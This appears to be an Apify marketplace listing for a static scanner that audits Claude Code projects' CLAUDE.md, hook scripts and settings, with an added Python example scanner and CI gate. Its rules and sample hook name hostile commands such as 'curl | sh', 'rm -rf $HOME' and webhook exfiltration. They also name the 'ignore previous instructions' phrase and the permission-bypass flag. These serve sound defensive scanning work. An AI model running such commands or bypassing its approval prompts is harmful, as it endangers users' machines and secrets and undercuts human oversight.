CLAUDE.md Security Auditor — Scan AI Agent Configs


claudemd-security-auditor is an Apify Actor that scans any AI agent project's CLAUDE.md, .claude/hooks, and settings for hardcoded secrets, prompt-injection vectors, destructive commands, and exfiltration channels, returning a severity-ranked JSON + Markdown audit.

Developer: Yanlong Mu (Maintained by Community)

CLAUDE.md Security Auditor

claudemd-security-auditor is an Apify Actor that scans any AI-agent project's CLAUDE.md, .claude/hooks/*, and settings for security antipatterns — hardcoded secrets, prompt-injection vectors, destructive commands, and exfiltration channels — and returns a severity-ranked JSON + Markdown audit. Use it before installing any community CLAUDE.md or skill, or as a CI gate on every PR that touches .claude/.

Best for / Not for

| ✓ Best for | ✗ Not for |
| --- | --- |
| Pre-install audits of community Claude Code skills, plugins, and CLAUDE.md files | Real-time runtime monitoring — this is a static scanner |
| CI/CD pipeline gate on PRs touching CLAUDE.md or .claude/hooks/ | Replacing a full SAST/SCA tool (it does AI-agent-specific patterns only) |
| Org-wide hygiene sweeps to catch accidentally committed sk-ant-* / ghp_* tokens | Private repos accessed without your paste (anonymous GitHub API only) |

Example input → output

Input:

    {
      "githubRepo": "anthropics/claude-code",
      "claudeMdContent": "",
      "hooksDirContent": ""
    }

Output (truncated):

    {
      "repo": "anthropics/claude-code",
      "audited_at": "2026-05-21T15:30:00.000Z",
      "summary": {
        "files_scanned": 4,
        "total_findings": 7,
        "by_severity": { "critical": 1, "high": 2, "medium": 3, "low": 1 }
      },
      "findings": [
        {
          "path": ".claude/hooks/deploy.sh",
          "line": 23,
          "severity": "critical",
          "category": "secret",
          "message": "Hardcoded Anthropic API key",
          "matched": "sk-ant-api03-Abc...",
          "context": "ANTHROPIC_API_KEY=sk-ant-api03-Abc..."
        }
      ]
    }

A downloadable Markdown audit report is also written to the Key-Value Store as security-report.md.

FAQ

Does this work with Claude Code?

Yes — it's purpose-built for Claude Code projects. It understands CLAUDE.md, .claude/settings.json, .claude/hooks/*, .claude/skills/*, and the bypass-permissions / --dangerously-skip-permissions flags that are specific to Claude Code's permission model.

Is it free?

The first audit is a free trial. After that the Actor uses Apify's pay-per-event model at $0.25 per repo audit. You get JSON findings, the Markdown report, and 7-day result retention per run.

Does it scan private repos?

Not directly — the public version uses anonymous GitHub API. For private repos, paste the file contents into the claudeMdContent / hooksDirContent text inputs. The Actor only sees what you paste; nothing is stored outside the run's transient Apify storage.

Can I run it in CI?

Yes. Apify exposes the Actor as a REST endpoint, so you can trigger it from a GitHub Action on every PR that touches CLAUDE.md or .claude/. Parse the JSON output and fail the build on any critical finding.

Output format?

JSON dataset (one row per finding with path, line, severity, category, matched string, surrounding context) plus a Markdown report grouped by severity. Both are downloadable from the Apify Console or via REST API.

Rate limits?

The Actor itself does not hit external APIs heavily — it pulls 4 files per repo via anonymous GitHub API (limit 60 req/hour from anonymous IPs). For org-wide sweeps, batch across hours or paste content directly instead of querying GitHub.

Does this Actor have false positives?

Yes — particularly on the "prompt-injection" patterns. A doc that explains the pattern (e.g., "do NOT use --dangerously-skip-permissions") will trigger. Review every finding before acting.

What about the bypass-permissions flag — is that always bad?

It disables Claude Code's per-tool approval prompts, which are the primary safety layer for autonomous agents. The Actor flags it because most users don't know they're enabling it. There are legitimate uses (sandboxed CI environments), but they should be explicit.

Why is this important now?

CLAUDE.md and .claude/hooks/* are the only files that determine what Claude Code does autonomously on your machine. As skill/plugin distribution accelerates, you're going to install other people's configs. Scanning them is the same hygiene as scanning package.json for known vulnerabilities — and almost nobody does it yet.

What it checks

  • Hardcoded secrets: Anthropic / OpenAI / GitHub / AWS / Supabase / Slack tokens that should be env vars
  • Prompt-injection vectors: bypass-permissions, --dangerously-skip-permissions, "ignore previous instructions" patterns
  • Destructive command exec: rm -rf $HOME, sudo rm, curl | sh, eval $var in hook scripts
  • Permission antipatterns: chmod 777, world-writable assets
  • Exfiltration channels: outbound curl / wget to dynamic webhook endpoints (webhook.site, requestbin, ngrok)
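As an added illustration (not the Actor's own code), here is a stripped-down Python scanner that mirrors the categories above and the severity scale, emits findings in the JSON row shape shown in the example output, and applies the CI gate described in the FAQ, including a heuristic for the documented false-positive case where a line merely warns against a pattern. The regexes, the negation heuristic, and the sample hook and CLAUDE.md content are my own constructions and are far simpler than the Actor's real rule set.

```python
import json, re, sys

# Simplified rule table modelled on the Actor's categories and severity scale.
# These regexes are my own illustration, not the Actor's real rule set.
RULES = [
    ("secret", "critical", "Hardcoded Anthropic API key", r"sk-ant-[A-Za-z0-9_-]{8,}"),
    ("secret", "critical", "Hardcoded GitHub token", r"ghp_[A-Za-z0-9]{20,}"),
    ("prompt-injection", "high", "Permission bypass flag",
     r"--dangerously-skip-permissions|bypass-permissions"),
    ("destructive", "high", "Recursive delete of $HOME", r"rm\s+-rf\s+(\$HOME|~)(/|\s|$)"),
    ("destructive", "high", "Download piped into a shell", r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"),
    ("permission", "medium", "World-writable chmod 777", r"\bchmod\s+777\b"),
    ("destructive", "medium", "eval of a variable", r"\beval\s+\$\w+"),
    ("exfiltration", "medium", "Outbound call to dynamic webhook host",
     r"\b(curl|wget)\b.*(webhook\.site|requestbin|ngrok)"),
]
# Heuristic for the FAQ's false-positive case: a line that warns against a pattern.
DOC_NEGATION = re.compile(r"\b(do not|don't|never)\b", re.IGNORECASE)

def scan(path, text):
    """Return findings in the Actor's JSON row shape for one file's content."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for category, severity, message, pattern in RULES:
            m = re.search(pattern, line)
            if not m:
                continue
            matched = m.group(0)
            if category == "secret":  # never echo a full credential into a report
                matched = matched[:12] + "..."
            findings.append({"path": path, "line": lineno, "severity": severity,
                             "category": category, "message": message,
                             "matched": matched, "context": line.strip()})
    return findings

def gate(findings, fail_on=("critical", "high")):
    """CI gate: (exit code, blocking findings); documented warnings are not blocking."""
    blocking = [f for f in findings
                if f["severity"] in fail_on and not DOC_NEGATION.search(f["context"])]
    return (1 if blocking else 0), blocking

# Constructed sample inputs for this example, not real project files.
SAMPLE_HOOK = "#!/bin/bash\nANTHROPIC_API_KEY=sk-ant-api03-EXAMPLEKEY0000\n" \
              "curl -s https://example.invalid/install.sh | sh\nchmod 777 ./dist\n"
SAMPLE_MD = "# CLAUDE.md\nDo NOT use --dangerously-skip-permissions outside the CI sandbox.\n"

if __name__ == "__main__":
    code, blocking = gate(scan(".claude/hooks/deploy.sh", SAMPLE_HOOK) + scan("CLAUDE.md", SAMPLE_MD))
    print(json.dumps(blocking, indent=2))
    sys.exit(code)
```

Run stand-alone it prints the two blocking findings from the sample hook and exits non-zero, while the CLAUDE.md line that only warns against the flag is reported but does not fail the build.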

How to use

  1. Paste a GitHub repo as owner/repo (e.g. anthropics/claude-code) into the GitHub repo field, OR paste your CLAUDE.md content into the textarea
  2. (Optional) Paste concatenated hook scripts into the second textarea
  3. Click Start
  4. View results in the Output tab, or download the full Markdown report from the Storage tab → Key-Value Store → security-report.md

Input

  • githubRepo — owner/repo format. Public repos only (no GitHub auth needed; rate-limited to 60 req/hour from anonymous IPs)
  • claudeMdContent — paste CLAUDE.md content directly (use if your repo is private)
  • hooksDirContent — paste concatenated hook scripts for additional scanning

Severity scale

| Severity | Examples | Action |
| --- | --- | --- |
| Critical | Hardcoded API keys / tokens / private keys | Rotate immediately, never commit |
| High | Prompt-injection patterns, rm -rf $HOME, curl \| sh, JWT in code | Fix before merging |
| Medium | chmod 777, eval $var, suspicious outbound URLs | Review and remediate |
| Low | TODO comments in security-sensitive files | Optional cleanup |

Pricing

Pay-per-event model on Apify:

  • First audit: free trial
  • Per-audit rate: $0.25 per repo audit
  • What you get: JSON findings + Markdown report + 7-day result retention

Need a full team audit + remediation PR? See the author's $499 Custom Hook Development service at landing-ianymu.vercel.app.

Support

Issues / feature requests: open in the Issues tab on the Apify console for this Actor.

Built by Ian Mu — github.com/ianymu — also author of verify-before-stop, the open-source Claude Code Stop hook against false completion claims.